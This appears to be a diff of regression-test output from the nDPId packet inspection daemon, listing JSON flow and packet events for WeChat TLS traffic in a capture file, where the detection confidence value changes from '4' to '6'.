-01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
+00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1492167454801,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454801,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701bGHEoeHTtsI6ASN8gRwgAAAgQFoAQCCApF0gdIADEdBAEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1492167454802,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167454802,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cSdAAEAGpB3AqAFny82XotNWAbsdO2wjxhxKH4AQAOV3BwAAAQEICgAxHVpF0gdI"} 
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454458,"flow_last_seen":1492167454802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454802,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454458,"flow_last_seen":1492167454802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454802,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454818,"flow_last_seen":1492167454818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454818,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1492167454818,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454818,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8NuJAAEAG3lrAqAFny82XotNXAbvn9Cu8AAAAAKACchCqHQAAAgQFtAQCCAoAMR1eAAAAAAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1492167454836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454836,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG701XgAvN\/nuz0f6ASN8ip9gAAAgQFoAQCCApFraHjADEdBAEDAwc="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1492167454836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167454836,"pkt":"8IQvSpdgeJKcD6iOCABFAAA06XtAAEAGK8nAqAFny82XotNVAbue7PR\/4ALzgIAQAOUPMwAAAQEICgAxHWNFraHj"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454457,"flow_last_seen":1492167454837,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454837,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":544,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454458,"flow_last_seen":1492167455179,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1492167455179,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454457,"flow_last_seen":1492167454837,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454837,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":544,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454458,"flow_last_seen":1492167455179,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1492167455179,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1492167455179,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455179,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701d\/O17O5\/QrvaASN8geewAAAgQFoAQCCApFraI2ADEdXgEDAwc="} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1492167455179,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167455179,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0NuNAAEAG3mHAqAFny82XotNXAbvn9Cu9fztez4AQAOWDvAAAAQEICgAxHbhFraI2"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454818,"flow_last_seen":1492167455180,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167455180,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454457,"flow_last_seen":1492167455193,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167455193,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454457,"flow_last_seen":1492167455196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167455196,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
-00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":567,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454818,"flow_last_seen":1492167455501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167455501,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454818,"flow_last_seen":1492167455502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167455502,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454818,"flow_last_seen":1492167455180,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167455180,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454457,"flow_last_seen":1492167455193,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167455193,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454457,"flow_last_seen":1492167455196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167455196,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":567,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454818,"flow_last_seen":1492167455501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167455501,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454818,"flow_last_seen":1492167455502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167455502,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167455528,"flow_last_seen":1492167455528,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167455528,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1492167455528,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455528,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8kudAAEAGglXAqAFny82XotNYAbvneYz3AAAAAKACchBIqgAAAgQFtAQCCAoAMR4QAAAAAAEDAwc="} 